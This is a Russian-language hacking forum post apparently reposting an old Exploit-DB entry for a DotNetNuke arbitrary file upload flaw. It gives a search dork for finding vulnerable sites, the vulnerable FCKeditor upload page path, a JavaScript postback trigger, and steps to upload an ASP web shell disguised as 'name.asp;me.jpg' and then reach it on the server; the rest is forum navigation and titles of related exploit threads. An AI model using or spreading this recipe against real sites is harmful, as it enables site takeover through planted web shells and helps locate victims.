Exploit DotNetNuke - Arbitrary File Upload

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12700
Проверка EDB
  1. Пройдено
Автор
RA3CH & MA3STR0-DZ
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
N/A
Дата публикации
2010-05-22
Код: 
************************************************************
**      DotNetNuke Remote File upload Vulnerability 
************************************************************
**  Prodcut:        DotNetNuke   
**  Home   :         www.DZ4All.cOm/Cc
**  Vunlerability :    Remote File upload
**  Risk  :        High
**  Dork :         inurl:tabid/176/Default.aspx or inurl:portals/0/
************************************************************
**
** Original discovery and credit goes to: Alireza Afzali of ISCN Team
** Found date: 5/17/2009
** http://securityreason.com/exploitalert/6234
**
** Authors     :    Ra3cH & Ma3sTr0-Dz
** From        :    Algeria
** Contact     :     [email protected]
** *********************************************************
** Greetz to :     ALLAH 
**         All Members of  http://www.DZ4All.cOm/Cc
**         And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & Ma3sTr0-Dz
************************************************************
**  Exploit:
**  http://[PATH]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
**
**  AnD Add :  javascript:__doPostBack('ctlURL$cmdUpload','')
**
** 
**  AnD UpLOaD YoUr ShEll AsP LiKe    Dz4aLL.asp;me.jpg  
************************************************************
**
**  you find your Shell Hier 
**
**  http://[PATH]/portals/0/dz4all.asp;me.jpg
*************************************************************
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)
Ответы
0
Просмотры
751
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DotNetNuke 07.04.00 - Administration Authentication Bypass
Ответы
0
Просмотры
510
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DotNetNuke 6.1.x - Cross-Site Scripting
Ответы
0
Просмотры
438
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DotNetNuke 4.0 - HTML Injection
Ответы
0
Просмотры
369
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DotNetNuke 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting
Ответы
0
Просмотры
352
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DotNetNuke 5.5.1 - 'InstallWizard.aspx' Cross-Site Scripting
Ответы
0
Просмотры
365
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DotNetNuke DNNArticle Module 10.0 - SQL Injection
Ответы
0
Просмотры
349
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DotNetNuke 4.8.3 - 'Default.aspx' Cross-Site Scripting
Ответы
0
Просмотры
344
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption
Ответы
0
Просмотры
348
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
Ответы
0
Просмотры
688
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу